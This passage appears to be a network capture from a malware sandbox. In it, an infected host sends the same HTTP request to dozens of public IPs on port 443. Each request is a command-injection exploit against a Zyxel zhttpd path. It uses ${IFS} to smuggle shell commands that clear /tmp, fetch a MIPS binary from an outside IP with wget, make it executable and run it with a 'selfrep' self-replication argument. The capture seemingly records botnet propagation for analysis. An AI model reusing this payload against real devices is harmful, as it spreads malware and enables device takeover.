                                            Feb 2, 2024 06:21:03.453289032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1938192.168.2.1541668203.219.144.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453332901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1939192.168.2.1557116101.47.7.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453355074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1940192.168.2.1552280213.240.15.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453382015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1941192.168.2.1550202221.243.216.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453416109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1942192.168.2.155192232.238.40.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453474045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1943192.168.2.155283038.251.214.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453516006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1944192.168.2.1551896135.249.151.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453552961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1945192.168.2.1559972218.103.28.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453568935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1946192.168.2.1541244155.140.54.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453624964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1947192.168.2.1550794139.197.164.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453665972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1948192.168.2.1535332110.231.114.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453696966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1949192.168.2.154686263.14.32.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453733921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1950192.168.2.1551820198.171.191.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453773022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1951192.168.2.155673884.119.102.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453799963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1952192.168.2.1537754173.102.161.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453846931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1953192.168.2.1550340217.208.125.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453881025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1954192.168.2.154072432.9.25.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453918934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1955192.168.2.1558160113.212.163.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453958988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1956192.168.2.155788871.139.138.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454005957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1957192.168.2.1545284210.168.117.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454010963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1958192.168.2.154648267.41.165.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454046011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1959192.168.2.153409698.230.137.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454097986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1960192.168.2.1548910133.210.102.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454134941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1961192.168.2.1557372182.112.191.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454165936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1962192.168.2.155863469.81.251.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454210997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1963192.168.2.1558726206.77.38.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454245090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1964192.168.2.1544848133.241.178.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454287052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1965192.168.2.153716494.57.202.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454319954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1966192.168.2.155165260.8.106.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454389095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1967192.168.2.1551732162.84.255.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454416037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1968192.168.2.1554654189.120.79.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454454899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1969192.168.2.1553628180.139.125.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454498053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1970192.168.2.1545660223.57.175.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454533100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1971192.168.2.155732879.242.197.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454583883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1972192.168.2.154186048.58.146.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454623938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1973192.168.2.1536646220.127.225.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454649925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1974192.168.2.1544344219.130.34.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454694033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1975192.168.2.155207241.147.117.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454729080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1976192.168.2.1555652205.170.31.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454767942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1977192.168.2.153627062.12.57.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454796076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1978192.168.2.1544568112.102.84.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454853058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1979192.168.2.1556234212.1.219.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454890966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1980192.168.2.1533560176.176.17.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454931974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1981192.168.2.155719623.62.0.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.454957962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1982192.168.2.1539462187.237.42.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455005884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1983192.168.2.1543148169.195.3.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455040932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1984192.168.2.1542756169.131.149.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455065012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1985192.168.2.1559048110.233.252.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455112934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1986192.168.2.1548572178.249.183.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455168009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1987192.168.2.153537682.194.199.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455214977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1988192.168.2.1539150107.236.138.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455241919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1989192.168.2.1536358119.248.151.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455271959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1990192.168.2.1543884187.250.35.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455297947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1991192.168.2.1538776125.216.248.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455322981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1992192.168.2.1537382208.179.214.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455388069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1993192.168.2.1544174138.79.239.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455426931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1994192.168.2.154627479.86.5.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455456972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1995192.168.2.1558342170.138.215.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455504894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1996192.168.2.1547340120.10.226.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455547094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1997192.168.2.15410885.67.104.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455569983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1998192.168.2.155967659.85.78.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455617905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1999192.168.2.155692862.109.168.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455643892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2000192.168.2.1554928222.25.85.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455678940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2001192.168.2.1544536198.97.20.98443
                                            TimestampBytes transferredDirectionData
